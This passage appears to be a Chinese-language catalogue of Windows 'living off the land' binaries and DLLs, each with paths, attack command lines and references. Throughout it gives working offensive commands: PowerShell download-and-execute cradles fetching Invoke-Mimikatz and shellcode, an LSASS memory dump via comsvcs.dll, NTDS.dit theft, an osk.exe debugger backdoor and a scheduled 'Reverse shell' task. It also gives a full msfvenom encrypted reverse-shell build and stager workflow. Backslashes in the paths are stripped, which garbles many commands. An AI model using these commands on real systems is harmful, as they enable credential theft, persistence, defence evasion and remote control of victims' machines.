    https://www.contextis.com/resources/blog/applocker-bypass-registry-key-manipulation/
    
    
    https://twitter.com/bohops/status/955659561008017409
    
    
    https://docs.microsoft.com/en-us/windows/desktop/shell/executing-control-panel-items
    
    https://bohops.com/2018/01/23/loading-alternate-data-stream-ads-dll-cpl-binaries-to-bypass-applocker/

    Csc.exe

    使用说明:

    .NET可以使用csc程序来编译C#代码。

    文件路径:

    C:WindowsMicrosoft.NETFrameworkv4.0.30319Csc.exe
    C:WindowsMicrosoft.NETFramework64v4.0.30319Csc.exe

    执行方式:

    csc.exe -out:My.exe File.cs
    csc -target:library File.cs

    参考资料:

    https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/command-line-building-with-csc-exe

    Dfsvc.exe

    使用说明:

    dfsvc.exe是用来检查应用程序是否已经安装并且是最新的,如果需要的话将应用程序下载到用户AppData中的ClickOnce文件夹,然后从当前位置(随着每次更新而改变)启动它。

    文件路径:

    C:WindowsMicrosoft.NETFrameworkv2.0.50727Dfsvc.exe
    C:WindowsMicrosoft.NETFramework64v2.0.50727Dfsvc.exe
    C:WindowsMicrosoft.NETFrameworkv4.0.30319Dfsvc.exe
    C:WindowsMicrosoft.NETFramework64v4.0.30319Dfsvc.exe

    执行方式:

    rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo

    参考资料:

    https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
    https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe

    Dnscmd.exe

    使用说明:

    用于管理DNS服务器的命令行界面

    文件路径:

    C:WindowsSystem32Dnscmd.exe
    C:WindowsSysWOW64Dnscmd.exe

    执行方式:

    dnscmd.exe dc1.lab.int /config /serverlevelplugindll \192.168.0.149dllwtf.dll

    参考资料:

    https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83
    
    https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html
    
    
    https://github.com/dim0x69/dns-exe-persistance/tree/master/dns-plugindll-vcpp
    
    
    https://twitter.com/Hexacorn/status/994000792628719618
    
    http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html

    Esentutl.exe

    使用说明:

    用于处理Microsoft联合引擎技术(JET)数据库的二进制文件

    文件路径:

    C:WindowsSystem32esentutl.exe
    C:WindowsSysWOW64esentutl.exe

    执行方式:

    esentutl.exe /y C:foldersourcefile.vbs /d C:folderdestfile.vbs /o
    esentutl.exe /y /vss c:windows
    tds
    tds.dit /d c:folder
    tds.dit
    esentutl.exe /y C:ADSfile.exe /d c:ADSfile.txt:file.exe /o
    esentutl.exe /y C:ADSfile.txt:file.exe /d c:ADSfile.exe /o
    esentutl.exe /y \192.168.100.100webdavfile.exe /d c:ADSfile.txt:file.exe /o
    esentutl.exe /y \live.sysinternals.com	oolsadrestore.exe /d \otherwebdavserverwebdavadrestore.exe /o

    参考资料:

    https://twitter.com/egre55/status/985994639202283520
    
    https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/
    
    https://twitter.com/bohops/status/1094810861095534592

    Eventvwr.exe

    使用说明:

    在GUI窗口中显示Windows事件日志。

    文件路径:

    C:WindowsSystem32eventvwr.exe
    C:WindowsSysWOW64eventvwr.exe

    执行方式:

    eventvwr.exe

    参考资料:

    https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
    https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1

    Expand.exe

    使用说明:

    expand.exe是一个可执行文件,属于Microsoft Corporation开发的User Profile Hive Cleanup Service程序的一部分。 用于扩展对文件压缩的功能。

    文件路径:

    C:WindowsSystem32Expand.exe
    C:WindowsSysWOW64Expand.exe

    执行方式:

    expand \webdavfolderfile.bat c:ADSfile.bat
    expand c:ADSfile1.bat c:ADSfile2.bat
    expand \webdavfolderfile.bat c:ADSfile.txt:file.bat

    参考资料:

    https://twitter.com/infosecn1nja/status/986628482858807297
    https://twitter.com/Oddvarmoe/status/986709068759949319

    Extexport.exe

    使用说明:ExtExport.exe是可执行文件,属于Microsoft Corporation开发的Internet Explorer程序的一部分。

    文件路径:

    C:Program FilesInternet ExplorerExtexport.exe
    C:Program Files (x86)Internet ExplorerExtexport.exe

    执行方式:

    Extexport.exe c:test foo bar

    参考资料:

    http://www.hexacorn.com/blog/2018/04/24/extexport-yet-another-lolbin/

    Extrac32.exe

    使用说明:extrac32.exe是属于Microsoft®CAB File Extract Utility的进程。

    文件路径:

    C:WindowsSystem32extrac32.exe
    C:WindowsSysWOW64extrac32.exe

    执行方式:

    extrac32 C:ADSprocexp.cab c:ADSfile.txt:procexp.exe
    extrac32 \webdavserverwebdavfile.cab c:ADSfile.txt:file.exe
    extrac32 /Y /C \webdavservershare	est.txt C:folder	est.txt

    参考资料:

    https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
    
    https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
    
    https://twitter.com/egre55/status/985994639202283520

    Findstr.exe

    使用说明:

    findstr.exe它类似于find命令。 findstr支持正则表达式,而find不支持。 findstr程序最初作为Windows 2000 Resource Kit的一部分发布,名称为qgrep。

    文件路径:

    C:WindowsSystem32findstr.exe
    C:WindowsSysWOW64findstr.exe

    执行方式:

    findstr /V /L W3AllLov3DonaldTrump c:ADSfile.exe > c:ADSfile.txt:file.exe
    findstr /V /L W3AllLov3DonaldTrump \webdavserverfolderfile.exe > c:ADSfile.txt:file.exe
    findstr /S /I cpassword \sysvolpolicies*.xml
    findstr /V /L W3AllLov3DonaldTrump \webdavserverfolderfile.exe > c:ADSfile.exe

    参考资料:

    https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
    https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f

    GfxDownloadWrapper.exe

    使用说明:

    英特尔图形控制面板使用GfxDownloadWrapper.exe来进行远程文件下载,接收第一个参数URL和目标文件路径。

    文件路径:

    c:windowssystem32driverstorefilerepository64kb6472.inf_amd64_3daef03bbe98572b
    c:windowssystem32driverstorefilerepositorycui_comp.inf_amd64_0e9c57ae3396e055
    c:windowssystem32driverstorefilerepositorycui_component.inf_amd64_0219cc1c7085a93f

    执行方式:

    C:WindowsSystem32DriverStoreFileRepositoryigdlh64.inf_amd64_[0-9]+GfxDownloadWrapper.exe "URL" "DESTINATION FILE"

    参考资料:

    https://www.sothis.tech/author/jgalvez/

    Gpscript.exe

    使用说明:

    组策略使用Gpscript.exe来处理脚本。

    文件路径:

    C:WindowsSystem32gpscript.exe
    C:WindowsSysWOW64gpscript.exe

    执行方式:

    Gpscript /logon
    Gpscript /startup

    参考资料:

    https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/

    Hh.exe

    使用说明:

    hh.exe文件是其HTML帮助可执行程序,它是合法的Windows核心文件。 通过单击文件或链接的菜单项打开“编译的帮助文件”(类型.chm)时,它将运行。 通过调用HTML帮助ActiveX控件,它将使帮助文件在帮助查看器中打开。

    文件路径:

    C:WindowsSystem32hh.exe
    C:WindowsSysWOW64hh.exe

    执行方式:

    HH.exe http://some.url/script.ps1
    HH.exe c:windowssystem32calc.exe

    参考资料:

    https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/

    Ie4uinit.exe

    使用说明:

    Ie4uinit.exe, Internet Explorer每用户初始化实用程序,它对图标缓存数据库执行操作,该图标缓存数据库是“%userprofile% AppData Local”子目录中的一个隐藏的“ .db”类型文件,图标缓存保留Windows或IE使用的图标副本,以避免重复重绘它们。

    文件路径:

    c:windowssystem32ie4uinit.exe
    c:windowssysWOW64ie4uinit.exe
    c:windowssystem32ieuinit.inf
    c:windowssysWOW64ieuinit.inf

    执行方式:

    ie4uinit.exe -BaseSettings

    参考资料:

    https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/

    Jsc.exe

    使用说明:

    jsc.exe是Microsoft Corporation开发的Microsoft®JScript .NET的一部分,用来将javascript代码编译为.exe或.dll格式的二进制文件。

    文件路径:

    C:WindowsMicrosoft.NETFrameworkv4.0.30319Jsc.exe
    C:WindowsMicrosoft.NETFramework64v4.0.30319Jsc.exe
    C:WindowsMicrosoft.NETFrameworkv2.0.50727Jsc.exe
    C:WindowsMicrosoft.NETFramework64v2.0.50727Jsc.exe

    执行方式:

    jsc.exe scriptfile.js
    jsc.exe /t:library Library.js

    参考资料:

    https://twitter.com/DissectMalware/status/998797808907046913
    https://www.phpied.com/make-your-javascript-a-windows-exe/

    Makecab.exe

    使用说明:

    Makecab.exe用于将文件打包成Cabinet(.cab)文件。

    文件路径:

    C:WindowsSystem32makecab.exe
    C:WindowsSysWOW64makecab.exe

    执行方式:

    makecab c:ADSautoruns.exe c:ADScabtest.txt:autoruns.cab
    makecab \webdavserverwebdavfile.exe C:Folderfile.txt:file.cab

    参考资料:

    https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f

    Mmc.exe

    使用说明:

    mmc.exe是系统管理程序的一个框架程序,全称是Microsoft Management Console,它提供给扩展名为msc的管理程序一个运行的平台,比如组策略,系统清单,任务管理器,以及打印管理、本地安全策略等等,另外本进程也可能同时运行两个或更多个。

    文件路径:

    C:WindowsSystem32mmc.exe
    C:WindowsSysWOW64mmc.exe

    执行方式:

    mmc.exe -Embedding c:pathtotest.msc

    参考资料:

    https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/

    Msconfig.exe

    使用说明:

    msconfig.exe用于查看、编辑和管理操作系统配置文件及随操作系统自动启动的程序/服务,包括:Win.ini、boot.ini、系统服务和自动启动程序等。

    文件路径:

    C:WindowsSystem32msconfig.exe

    执行方式:

    执行嵌入在c:windowssystem32mscfgtlc.xml中的命令。

    Msconfig.exe -5

    参考资料:

    https://twitter.com/pabraeken/status/991314564896690177

    Msdt.exe

    使用说明:Microsoft诊断工具

    文件路径:

    C:WindowsSystem32Msdt.exe
    C:WindowsSysWOW64Msdt.exe

    执行方式:

    msdt.exe -path C:WINDOWSdiagnosticsindexPCWDiagnostic.xml -af C:PCW8E57.xml /skip TRUE

    参考资料:

    https://web.archive.org/web/20160322142537/https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/
    
    https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
    
    https://twitter.com/harr0ey/status/991338229952598016

    Netsh.exe

    使用说明:

    Netsh.exe 是一个管理员可以用来在命令提示符处配置并监视基于 Windows 的计算机的工具。使用 Netsh.exe 工具,可以将输入的上下文命令定向到适当的帮助器,然后帮助器将执行命令。帮助器是个动态链接库 (.dll) 文件,它通过提供配置、监视和支持一种或多种服务、实用工具或协议,来扩展 Netsh.exe 工具的功能。

    文件路径:

    C:WINDOWSSystem32Netsh.exe
    C:WINDOWSSysWOW64Netsh.exe

    执行方式:

    netsh.exe add helper C:UsersUserfile.dll

    参考资料:

    https://freddiebarrsmith.com/trix/trix.html
    
    https://htmlpreview.github.io/?https://github.com/MatthewDemaske/blogbackup/blob/master/netshell.html
    
    https://liberty-shell.com/sec/2018/07/28/netshlep/

    Pcwrun.exe

    使用说明:

    程序兼容性疑难解答调用程序。

    文件路径:

    C:WindowsSystem32pcwrun.exe

    执行方式:

    Pcwrun.exe c:tempbeacon.exe

    参考资料:

    https://twitter.com/pabraeken/status/991335019833708544

    Powershell.exe

    使用说明:

    Windows PowerShell 旨在改进命令行和脚本环境。PowerShell以.NET Framework为平台,接收和返回.NET对象,此举为管理和配置微软系统带来了新的方法和工具。

    文件路径:

    64位版本:C: Windows  System32  WindowsPowerShell  v1.0
    32位版本:C: Windows  SysWOW64  WindowsPowerShell  v1.0

    执行方式:

    a)、powershell -exec bypass -c (new-object System.Net.WebClient).DownloadFile('http://x/1.jpg‘,'C:UsersxDesktop	est12.exe')
    b)、powershell (Invoke-WebRequest http://x/1.jpg -O x.jpg)
    c)、也可以通过从UVC读取脚本执行:
    powershell -exec bypass -f \webdavservera.ps1
    d)、内存加载:
    1、powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz
    2、powershell -exec bypass -c "iwr https://gist.githubusercontent.com/Urahara3389/d83b6f9ccedf9aa53f70d987360dbc0e/raw/53ad790f87e0fd2c9449d5359358cd251c39297a/calc.ps1|iex"
    powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('cs shellcode address'))"

    参考资料:

    https://blog.csdn.net/a1453514850/article/details/88074300

    Print.exe

    使用说明:

    Print.exe是Windows用来将文件发送到打印机的程序。

    文件路径:

    C:WindowsSystem32print.exe
    C:WindowsSysWOW64print.exe

    执行方式:

    print /D:C:ADSFile.txt:file.exe C:ADSFile.exe
    print /D:C:ADSCopyOfFile.exe C:ADSFileToCopy.exe
    print /D:C:OutFolderoutfile.exe \WebDavServerFolderFile.exe

    参考资料:

    https://twitter.com/Oddvarmoe/status/985518877076541440
    https://www.*******.com/watch?v=nPBcSP8M7KE&lc=z22fg1cbdkabdf3x404t1aokgwd2zxasf2j3rbozrswnrk0h00410

    Reg.exe

    使用说明:

    reg.exe,用该命令向注册表加入一个新的指定键值

    文件路径:

    C:WindowsSystem32reg.exe
    C:WindowsSysWOW64reg.exe

    执行方式:

    reg export HKLMSOFTWAREMicrosoftEvilreg c:adsfile.txt:evilreg.reg

    参考资料:

    https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f

    Regedit.exe

    使用说明:

    regedit.exe是微软公司出品的一个进程文件。位于C:Windows目录,可用于修改Windows系统的注册表中的项,值以及数据。

    文件路径:

    C:WindowsSystem32regedit.exe
    C:WindowsSysWOW64regedit.exe

    执行方式:

    regedit /E c:adsfile.txt:regfile.reg HKEY_CURRENT_USERMyCustomRegKey
    regedit C:adsfile.txt:regfile.reg

    参考资料:

    https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f

    Register-cimprovider.exe

    使用说明:

    用于注册新的WMI提供程序。

    文件路径:

    C:WindowsSystem32Register-cimprovider.exe
    C:WindowsSysWOW64Register-cimprovider.exe

    执行方式:

    Register-cimprovider -path "C:folderevil.dll"

    参考资料:

    https://twitter.com/PhilipTsukerman/status/992021361106268161

    Replace.exe

    使用说明:

    命令行用于一个文件替换另一个文件。

    文件路径:

    C:WindowsSystem32replace.exe
    C:WindowsSysWOW64replace.exe

    执行方式:

    replace.exe C:SourceFile.cab C:Destination /A
    replace.exe \webdav.host.comfooar.exe c:outdir /A

    参考资料:

    https://twitter.com/elceef/status/986334113941655553
    https://twitter.com/elceef/status/986842299861782529

    R***ing.exe

    使用说明:

    用于验证rpc连接。

    文件路径:

    C:WindowsSystem32
    ***ing.exe
    C:WindowsSysWOW64
    ***ing.exe

    执行方式:

    r***ing -s 127.0.0.1 -e 1234 -a privacy -u NTLM

    参考资料:

    https://github.com/vysec/RedTips
    
    https://twitter.com/vysecurity/status/974806438316072960
    
    https://twitter.com/vysecurity/status/873181705024266241

    Runonce.exe

    使用说明:

    runonce.exe是微软Run Once的包装。它用于第三方应用程序的安装程序。它允许安装程序添加到启动项中,用于再次启动后,进行进一步配置。这个程序对你系统的正常运行是非常重要的。

    文件路径:

    C:WindowsSystem32runonce.exe
    C:WindowsSysWOW64runonce.exe

    执行方式:

    Runonce.exe /AlternateShellStartup

    参考资料:

    https://twitter.com/pabraeken/status/990717080805789697
    https://cmatskas.com/configure-a-runonce-task-on-windows/

    Runscripthelper.exe

    使用说明:runscripthelper.exe是在Windows 10 RS3中引入的,它所做的事情是从一个特定的目录读取PowerShell代码并执行这些代码。

    文件路径:

    C:WindowsWinSxSamd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118Runscripthelper.exe
    C:WindowsWinSxSamd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4aRunscripthelper.exe

    执行方式:

    runscripthelper.exe surfacecheck \?C:TestMicrosoftDiagnosisscriptstest.txt C:Test

    参考资料:

    https://posts.specterops.io/bypassing-application-whitelisting-with-runscripthelper-exe-1906923658fc
    http://www.4hou.com/technology/8999.html

    Sc.exe

    使用说明:

    使用 Sc.exe 可以帮助开发的 Windows 服务。Sc.exe,资源工具包中提供实现对所有在 Windows 服务的控件应用程序编程接口 (API) 函数的调用。您可以通过在命令行上指定这些设置对这些函数的参数。Sc.exe 也显示服务状态,并检索存储在状态结构字段中的值。该工具还允许您指定的远程计算机名称,以便您可以调用服务 API 函数或查看远程计算机上的服务状态结构。

    文件路径:

    C:WindowsSystem32sc.exe
    C:WindowsSysWOW64sc.exe

    执行方式:

    sc create evilservice binPath=""c:\ADS\file.txt:cmd.exe" /c echo works > "c:ADSworks.txt"" DisplayName= "evilservice" start= auto & sc start evilservice

    参考资料:

    https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/

    Schtasks.exe

    使用说明:schtasks.exe是安排命令和程序定期运行或在指定时间内运行。从计划表中添加和删除任务,按需要启动和停止任务,显示和更改计划任务。

    文件路径:

    c:windowssystem32schtasks.exe
    c:windowssyswow64schtasks.exe

    执行方式:

    schtasks /create /sc minute /mo 1 /tn "Reverse shell" /tr c:somedirectory
    evshell.exe

    参考资料:

    https://isc.sans.edu/forums/diary/Adding+Persistence+Via+Scheduled+Tasks/23633/

    Scriptrunner.exe

    使用说明:

    ScriptRunner.exe 被视为一种 Windows Executable 文件。它最常用于由 Microsoft 开发的 Microsoft (R) Windows (R) Operating System。它使用 EXE 文件扩展名, 并被视为 Win32 EXE (可执行的应用程序) 文件。

    ScriptRunner.exe 最初开发于 07/29/2015,位于 Windows 10 操作系统中,适用于 Windows 10。 此文件版本标记出来自Microsoft 的最新和最近更新版本。

    文件路径:

    C:WindowsSystem32scriptrunner.exe
    C:WindowsSysWOW64scriptrunner.exe

    执行方式:

    Scriptrunner.exe -appvscript calc.exe
    ScriptRunner.exe -appvscript "\fileservercalc.cmd"

    参考资料:

    https://twitter.com/KyleHanslovan/status/914800377580503040
    
    https://twitter.com/NickTyrer/status/914234924655312896
    
    https://github.com/MoooKitty/Code-Execution

    Tttracer.exe

    使用说明:

    TTTracer.exe,Microsoft的Time Travel工具,客户可以运行客户端版本来跟踪程序的流程。

    文件路径:

    C:WindowsSystem32tttracer.exe
    C:WindowsSysWOW64tttracer.exe

    执行方式:

    tttracer.exe C:windowssystem32calc.exe

    参考资料:

    https://twitter.com/oulusoyum/status/1191329746069655553
    
    https://twitter.com/mattifestation/status/1196390321783025666
    
    https://lists.samba.org/archive/cifs-protocol/2016-April/002877.html

    Verclsid.exe

    使用说明:

    verclsid.exe是Microsoft XP 安全更新程序 (KB908531)。Windows 资源管理器中有一个安全问题,攻击者可能会利用此问题危及基于 Windows 的系统的安全并获取对系统的控制权。

    文件路径:

    C:WindowsSystem32verclsid.exe
    C:WindowsSysWOW64verclsid.exe

    执行方式:

    verclsid.exe /S /C {CLSID}

    参考资料:

    https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5
    https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/

    Wab.exe

    使用说明:Windows通讯录管理器

    文件路径:

    C:Program FilesWindows Mailwab.exe
    C:Program Files (x86)Windows Mailwab.exe

    执行方式:

    更改HKLMSoftwareMicrosoftWABDLLPath并执行选择的DLL
    wab.exe

    参考资料:

    https://twitter.com/Hexacorn/status/991447379864932352
    http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/

    wmic.exe

    使用说明:wmic.exe是WMI 命令行。作为 Windows XP 的一部分发布的 WMI 命令行工具 (wmic.exe) 提供一个到 WMI 基础结构的命令行接口。可以使用 wmic.exe 执行来自命令行的常见 WMI 任务,包括浏览 CIM 和检查 CIM 类定义。

    文件路径:

    C:WindowsSystem32wbemwmic.exe
    C:WindowsSysWOW64wbemwmic.exe

    执行方式:

    wmic.exe process call create "c:adsfile.txt:program.exe"
    wmic.exe process call create calc
    wmic.exe process call create "C:Windowssystem32
    eg.exe add "HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsosk.exe" /v "Debugger" /t REG_SZ /d "cmd.exe" /f"
    wmic.exe /node:"192.168.0.1" process call create "evil.exe"
    wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "at 9:00PM c:GoogleUpdate.exe ^> c:
    otGoogleUpdateResults.txt"
    wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "cmd /c vssadmin create shadow /for=C:WindowsNTDSNTDS.dit > c:
    ot_the_NTDS.dit"
    wmic.exe process get brief /format:"https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl"
    wmic.exe process get brief /format:"\127.0.0.1c$Toolspocremote.xsl"

    参考资料:

    https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory
    
    https://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html
    
    https://twitter.com/subTee/status/986234811944648707

    Wsreset.exe

    使用说明:

    Windows应用商店重置工具。 只需将二进制文件放在磁盘上,然后将其位置写入更正注册表项,然后运行WSReset.exe。 二进制文件将以高特权运行。

    文件路径:

    C:WindowsSystem32wsreset.exe

    执行方式:

    wsreset.exe

    参考资料:

    https://www.activecyber.us/activelabs/windows-uac-bypass
    
    https://twitter.com/ihack4falafel/status/1106644790114947073
    
    https://github.com/hfiref0x/UACME/blob/master/README.md

    系统库文件(10个)

    Advpack.dll

    使用说明:

    使用rundll32.exe安装软件和驱动程序的实用程序

    文件路径:

    c:windowssystem32advpack.dll
    c:windowssyswow64advpack.dll

    执行方式:

    rundll32.exe advpack.dll,LaunchINFSection c:	est.inf,DefaultInstall_SingleUser,1,
    rundll32.exe advpack.dll,LaunchINFSection c:	est.inf,,1,
    rundll32.exe advpack.dll,RegisterOCX test.dll
    rundll32.exe advpack.dll,RegisterOCX calc.exe
    rundll32 advpack.dll, RegisterOCX "cmd.exe /c calc.exe"

    参考资料:

    https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/
    
    https://twitter.com/ItsReallyNick/status/967859147977850880
    
    
    https://twitter.com/bohops/status/974497123101179904
    
    https://twitter.com/moriarty_meng/status/977848311603380224

    Comsvcs.dll

    使用说明:

    使用rundll32.exe执行Com+服务。

    文件路径:

    c:windowssystem32comsvcs.dll

    执行方式:

    rundll32 C:windowssystem32comsvcs.dll MiniDump "[LSASS_PID] dump.bin full"

    参考资料:

    https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/

    Ieadvpack.dll

    使用说明:用于Internet Explorer的INF安装程序。 具有与advpack.dll相同的功能。

    文件路径:

    c:windowssystem32ieadvpack.dll
    c:windowssyswow64ieadvpack.dll

    执行方式:

    rundll32.exe ieadvpack.dll,LaunchINFSection c:	est.inf,DefaultInstall_SingleUser,1,
    rundll32.exe ieadvpack.dll,LaunchINFSection c:	est.inf,,1,
    rundll32.exe ieadvpack.dll,RegisterOCX test.dll
    rundll32.exe ieadvpack.dll,RegisterOCX calc.exe
    rundll32 ieadvpack.dll, RegisterOCX "cmd.exe /c calc.exe"

    参考资料:

    https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/
    
    https://twitter.com/pabraeken/status/991695411902599168
    
    https://twitter.com/0rbz_/status/974472392012689408

    Ieaframe.dll

    使用说明:Internet浏览器DLL,用于翻译HTML代码。

    文件路径:

    c:windowssystem32ieframe.dll
    c:windowssyswow64ieframe.dll

    执行方式:

    rundll32.exe ieframe.dll,OpenURL "C:testcalc.url"

    参考资料:

    http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/
    
    https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/
    
    
    https://twitter.com/bohops/status/997690405092290561
    
    https://windows10dll.nirsoft.net/ieframe_dll.html

    Mshtml.dll

    使用说明:Microsoft HTML 解析程序

    文件路径:

    c:windowssystem32mshtml.dll
    c:windowssyswow64mshtml.dll

    执行方式:

    rundll32.exe Mshtml.dll,PrintHTML "C:tempcalc.hta"

    参考资料:

    https://twitter.com/pabraeken/status/998567549670477824
    https://windows10dll.nirsoft.net/mshtml_dll.html

    Pcwutl.dll

    使用说明:Microsoft HTML 解析程序

    文件路径:

    c:windowssystem32pcwutl.dll
    c:windowssyswow64pcwutl.dll

    执行方式:

    rundll32.exe pcwutl.dll,LaunchApplication calc.exe

    参考资料:

    https://twitter.com/harr0ey/status/989617817849876488
    https://windows10dll.nirsoft.net/pcwutl_dll.html

    stager.dll/stager.exe

    使用说明:

    下载https://github.com/phackt/stager.dll

    先使用msfvenom生成payload

    msfvenom -p windows/x64/encrypted_shell_reverse_tcp LHOST=192.168.1.24 LPORT=443 --encrypt aes256 --encrypt-iv E7a0eCX76F0YzS4j --encrypt-key 6ASMkFslyhwXehNZw048cF1Vh1ACzyyR -f c -o /tmp/meterpreter.c

    替换cpp文件中的payload,编译生成dll:

    cl /LD /MT /EHa stager_dll_xx.cpp aes.cpp /Fe:stager.dll

    也可以编译生成exe

    cl /MT /EHa stager_exe_xx.cpp aes.cpp /Fe:stager.exe

    在靶机执行rundll32 stager.dll,Exec即可。

    参考资料:

    https://github.com/phackt/stager.dll
    https://wh0ale.github.io/2019/01/23/2019-1-23-%E5%90%8E%E6%B8%97%E9%80%8F%E8%AF%A6%E8%A7%A3/

    Setupapi.dll

    使用说明:Windows应用程序编程接口

    文件路径:

    c:windowssystem32setupapi.dll
    c:windowssyswow64setupapi.dll

    执行方式:

    rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:Toolsshady.inf

    参考资料:

    https://github.com/huntresslabs/evading-autoruns
    
    https://twitter.com/pabraeken/status/994742106852941825
    
    https://windows10dll.nirsoft.net/setupapi_dll.html

    Shdocvw.dll

    使用说明:

    shdocvw.dll是为Windows应用程序添加基础文件和网络操作相关模块

    文件路径:

    c:windowssystem32shdocvw.dll
    c:windowssyswow64shdocvw.dll

    执行方式:

    rundll32.exe shdocvw.dll,OpenURL "C:testcalc.url"

    参考资料:

    http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/
    
    https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/
    
    
    https://twitter.com/bohops/status/997690405092290561
    
    https://windows10dll.nirsoft.net/shdocvw_dll.html

    Shell32.dll

    使用说明:系统文件shell32.dll是存放在WindowsSystem32系统文件夹中的重要文件,通常情况下是在安装操作系统过程中自动创建的,对于系统正常运行来说至关重要。在正常情况下不建议用户对该类文件进行随意的修改,它的存在对维护计算机系统的稳定具有重要作用。

    文件路径:

    c:windowssystem32shell32.dll
    c:windowssyswow64shell32.dll

    执行方式:

    rundll32.exe shell32.dll,Control_RunDLL payload.dll

    参考资料:

    https://twitter.com/Hexacorn/status/885258886428725250
    
    https://twitter.com/pabraeken/status/991768766898941953
    
    
    https://twitter.com/mattifestation/status/776574940128485376
    
    
    https://twitter.com/KyleHanslovan/status/905189665120149506
    
    https://windows10dll.nirsoft.net/shell32_dll.html

    Syssetup.dll

    使用说明:Windows NT系统安装dll文件。

    文件路径:

    c:windowssystem32syssetup.dll
    c:windowssyswow64syssetup.dll

    执行方式:

    rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:testshady.inf
    rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:tempsomething.inf

    参考资料:

    https://twitter.com/pabraeken/status/994392481927258113
    
    https://twitter.com/harr0ey/status/975350238184697857
    
    
    https://twitter.com/bohops/status/975549525938135040
    
    https://windows10dll.nirsoft.net/syssetup_dll.html

    其他MS程序(21个)

    Appvlp.exe

    使用说明:

    Microsoft Office 2016附带的应用程序虚拟化实用程序。

    文件路径:

    C:Program FilesMicrosoft Officerootclientappvlp.exe
    C:Program Files (x86)Microsoft Officerootclientappvlp.exe

    执行方式:

    AppVLP.exe \webdavcalc.bat
    AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('calc.exe','', '', 'open', 1)"
    AppVLP.exe powershell.exe -c "$e=New-Object -ComObject excel.application;$e.RegisterXLL('\webdavxll_poc.xll')"

    参考资料:

    https://github.com/MoooKitty/Code-Execution
    
    https://twitter.com/moo_hax/status/892388990686347264
    
    
    https://enigma0x3.net/2018/06/11/the-tale-of-settingcontent-ms-files/
    
    https://securityboulevard.com/2018/07/attackers-test-new-document-attack-vector-that-slips-past-office-defenses/

    Bginfo.exe

    使用说明:

    BgInfo是SysInternals套件中的实用程序,它可以在桌面背景中直接显示计算机的系统信息。

    执行方式:

    bginfo.exe bginfo.bgi /popup /nolicprompt
    \10.10.10.10webdavginfo.exe bginfo.bgi /popup /nolicprompt
    \live.sysinternals.comToolsginfo.exe \10.10.10.10webdavginfo.bgi /popup /nolicprompt

    参考资料:

    https://pentestlab.blog/2017/06/05/applocker-bypass-bginfo/
    https://github.com/3gstudent/bgi-creater

    Cdb.exe

    使用说明:

    Windows Debug工具包中的一个调试工具。

    文件路径:

